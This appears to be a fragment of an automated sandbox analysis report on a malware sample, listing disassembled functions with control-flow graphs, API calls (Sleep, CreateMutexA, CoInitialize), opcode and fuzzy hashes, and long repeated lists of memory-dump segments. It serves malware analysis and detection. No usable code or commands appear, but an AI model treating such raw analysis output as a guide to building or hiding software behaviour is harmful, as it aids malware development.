                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 870e754d0848d9f7ac33c4c5e0e4161a5967be0fd07d99ad98e8fada69e4d457
                                                                                                                                                                                                                                          • Instruction ID: c5267253b7e07745193903cdc14d9e85b344a974437aa2035bdc395565619810
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 870e754d0848d9f7ac33c4c5e0e4161a5967be0fd07d99ad98e8fada69e4d457
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E216A32624201DBEB189F6CEDC9B6CB365EBC1310F204619E408D72D5CBB55DE08A12
                                                                                                                                                                                                                                          Function 0026A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1204 26a856-26a86e 1205 26a870-26a87c 1204->1205 1206 26a89c-26a89e 1204->1206 1207 26a892-26a899 call 27d663 1205->1207 1208 26a87e-26a88c 1205->1208 1209 26a8a0-26a8a7 1206->1209 1210 26a8a9-26a8b1 call 267d30 1206->1210 1207->1206 1208->1207 1211 26a94e 1208->1211 1213 26a8eb-26a916 call 2780c0 1209->1213 1220 26a8e4-26a8e6 1210->1220 1221 26a8b3-26a8bb call 267d30 1210->1221 1215 26a953-26a987 Sleep CreateMutexA 1211->1215 1216 26a94e call 296c6a 1211->1216 1224 26a98e-26a994 1215->1224 1216->1215 1220->1213 1221->1220 1228 26a8bd-26a8c5 call 267d30 1221->1228 1226 26a996-26a998 1224->1226 1227 26a9a7-26a9a8 1224->1227 1226->1227 1229 26a99a-26a9a5 1226->1229 1228->1220 1233 26a8c7-26a8cf call 267d30 1228->1233 1229->1227 1233->1220 1236 26a8d1-26a8d9 call 267d30 1233->1236 1236->1220 1239 26a8db-26a8e2 1236->1239 1239->1213
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: f200847dcf710c464bed358a249e60da265e1264527135b45147ff48dfe192d8
                                                                                                                                                                                                                                          • Instruction ID: 85795526a1ac7e8968dfe6ff920d05d91a593266a3695842932be685f22133fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f200847dcf710c464bed358a249e60da265e1264527135b45147ff48dfe192d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85216031279202D6FB145B7C9D9A72DB251EF82304F244D16E508B72D1CB7658F08D93
                                                                                                                                                                                                                                          Function 0026A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1181 26a34f-26a35b 1182 26a371-26a39a call 27d663 1181->1182 1183 26a35d-26a36b 1181->1183 1189 26a39c-26a3a8 1182->1189 1190 26a3c8-26a916 call 2780c0 1182->1190 1183->1182 1184 26a93a 1183->1184 1186 26a953-26a994 Sleep CreateMutexA 1184->1186 1187 26a93a call 296c6a 1184->1187 1195 26a996-26a998 1186->1195 1196 26a9a7-26a9a8 1186->1196 1187->1186 1192 26a3be-26a3c5 call 27d663 1189->1192 1193 26a3aa-26a3b8 1189->1193 1192->1190 1193->1184 1193->1192 1195->1196 1199 26a99a-26a9a5 1195->1199 1199->1196
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0026A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,002C3254), ref: 0026A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2,
                                                                                                                                                                                                                                          • API String ID: 1464230837-1264347116
                                                                                                                                                                                                                                          • Opcode ID: 9bae514ea390ddc2394693624f11a9e445213ab9175dc745656cd98157af37a1
                                                                                                                                                                                                                                          • Instruction ID: cb5345ea8cbcf216aaac40710f269eb7380f1b19d67d253b2ec3dbe1b4ba5f56
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bae514ea390ddc2394693624f11a9e445213ab9175dc745656cd98157af37a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A216A32265201DBEB089B28ED8976CB765DB81310F248619E808A73D4C77599E08A52
                                                                                                                                                                                                                                          Function 0026B1A0 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 244COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0026B3C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
